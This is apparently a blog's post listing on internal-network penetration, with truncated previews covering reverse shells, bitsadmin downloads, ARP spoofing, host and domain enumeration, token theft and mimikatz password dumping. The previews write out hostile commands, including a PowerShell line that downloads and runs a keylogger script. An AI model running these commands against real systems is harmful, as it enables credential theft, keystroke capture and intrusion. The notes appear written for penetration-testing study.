内网技巧
内网技巧
浅笑⁹⁹⁶
这个作者很懒,什么都没留下…
展开
-
bitsadmin windwos自带下载命令
bitsadmin的四种下载文件的方法一、bitsadmin /rawreturn /transfer getfile http://qianxiao996.cn/1.txt c:\1.txt二、bitsadmin /rawreturn /transfer getpayload http://qianxiao996.cn/1.txt c:\1.txt三、bitsadmin /transfer qianxiao996 http://qianxiao996.cn/1.txt c:\原创 2020-06-29 14:46:57 · 560 阅读 · 0 评论 -
各种环境下反弹shell
0x00 NC命令详解在介绍如何反弹shell之前,先了解相关知识要点。nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp,详细参数如下-g<网关> 设置路由器跃程通信网关,最多可设置8个。 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数。 -h 在线帮助。 -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。 -l 使用监听模式,管原创 2020-06-29 14:45:15 · 586 阅读 · 0 评论 -
Linux下反弹shell
0x00 NC命令详解在介绍如何反弹shell之前,先了解相关知识要点。nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp-v 参数,详细输出n参数高数netcat不要DNS反向查询IP的域名z参数,连接成功后立即关闭连接$ nc -v 172.31.100.7 21netcat 命...转载 2018-10-10 20:48:51 · 788 阅读 · 0 评论 -
内网渗透----域内信息收集
工具使用Nslookupnslookup # 进入交互式界面set type=all # 设置记录类型,可以设置为srv_ldap._tcp.dc._msdcs.school.com # 执行查询ADFind.exe列出域控列表Adfind.exe -sc...原创 2019-04-14 18:17:08 · 1421 阅读 · 0 评论 -
内网渗透----欺骗攻击
Ettercapettercapettercap -i eth0 -T -q -M arp:remote /192.168.199.171// /192.168.199.1//driftnetdriftnet -i eth0 -atcpdumptcpdump -i eth0 arp -w 3当192.168.199.171浏览图片时,会自动将图片下载至目录中:当192.1...原创 2019-01-09 15:42:24 · 1147 阅读 · 0 评论 -
内网渗透----windows信息收集整理
一、基础信息收集1.信息收集类型操作系统版本、内核、架构是否在虚拟化环境中,已安装的程序、补丁网络配置及连接防火墙设置用户信息、历史纪录(浏览器、登陆密码)共享信息、敏感文件、缓存信息、服务等2.系统信息systeminfo功能:心事有关计算机及其操作系统的详细配置,包括操作系统配置,安全信息,产品ID和硬件属性(如RAM,磁盘空间和网卡)Eggsysteminfo ...原创 2019-04-14 18:23:39 · 979 阅读 · 0 评论 -
内网渗透----Linux信息收集整理
一、基础信息收集1.查看系统类型cat /etc/issuecat /etc/*-releasecat /etc/lsb-releasecat /etc/redhat-release2.内核版本cat /proc versionuname -auname -mrsrpm -q kerneldmesg |grep Linuxls /root |grep vmlin...原创 2018-12-04 16:51:55 · 1867 阅读 · 0 评论 -
内网渗透----密码记录
Windows Powershelliex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-Keystrokes.ps1’); Get-Keystrokes –Logpath C:\log.tx...原创 2018-12-25 15:52:43 · 875 阅读 · 0 评论 -
内网渗透----文件传输
0x01.Windows目标1.FTPecho open 192.168.0.23 2121 &amp;gt;&amp;gt; 1.txt //登陆FTP服务器echo 123&amp;gt;&amp;gt;1.txt //用户名echo 123&amp;gt;&amp;gt;1.txt原创 2019-03-08 11:59:13 · 1446 阅读 · 0 评论 -
内网渗透----Linux下信息收集
1.系统类型cat /etc/issue查看系统名称Lsb-release查看系统名称、版本号2. 内核版本uname –a 查看所有信息ls /root |grep vmlinuz3. 进程ps aux 查看进程信息ps –ef查看进程信息4. 安装的软件包使用dpkg –l查看安装的软件包5. 服务配置查看apache配置文件6. 网络...原创 2018-12-04 16:51:38 · 4571 阅读 · 0 评论 -
内网渗透----Token 窃取与利用
0x00 前言在之前的文章《渗透技巧——程序的降权启动》介绍了使用 SelectMyParent 降权的方法,本质上是通过 token 窃取实现的。这一次将要对 token 窃取和利用做进一步介绍,测试常用工具,分享利用技巧。0x01 简介本文将要介绍以下内容 ;· Token 简介· Metasploit 中的 incognito· Windows 平台下的 incognito· ...原创 2018-12-03 20:37:34 · 2327 阅读 · 0 评论 -
内网渗透----使用mimikatz获取windows登陆口令
以管理员运行后,可以随机打一些字符,进入如下界面输入aaa::aaa,可展示所有模块:可采用log命令,保存日志获取hash与明文用户口令privilege::debug sekurlsa::logonPasswords从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...原创 2018-12-01 11:34:50 · 1994 阅读 · 0 评论 -
内网渗透----Windows下信息收集
一、基础信息收集使用systeminfo命令查看操作系统版本、架构、补丁情况Windows-Exploit-Suggester-master-u 参数升级并将数据库下载至本地:-i 参数指定系统信息文件;-d 参数指定本地数据库文件,提示需安装xlrd读取Excel文件:pip安装模块:再次运行,成功:使用Whomai、net user查看用户信息使用net lo...原创 2018-12-01 11:33:25 · 2219 阅读 · 0 评论 -
内网渗透----域环境搭建(server 2012)
先确定两台服务器相通1、配置静态IP与DNS 2、配置域服务点击服务器管理器-添加角色和功能-下一步-添加AD域服务:3、提升为域控制器安装完成后,可在旗帜处选择提升为域控制器添加新林添加密码需要重启重启之后可以进行安装,且安装完成后自动重启,重启后域环境已经配置好 4、配置域成员将DNS指向域控...原创 2018-11-28 21:56:32 · 1216 阅读 · 0 评论 -
内网渗透----域环境搭建(server 2008)
域控制器配置静态IP安装域服务点击服务器管理器-添加角色-下一步-添加AD域服务:安装过后运行安装向导:下一步后选择“在新林中新建域”:若提示密码不符合要求,则配置密码后再下一步:设置域名称:根据需求,选择林功能级别:建立DNS服务:默认选择后再次设置密码:重启后安装成功。添加域用户在域管理中新建用户:...原创 2018-11-29 10:13:26 · 1183 阅读 · 0 评论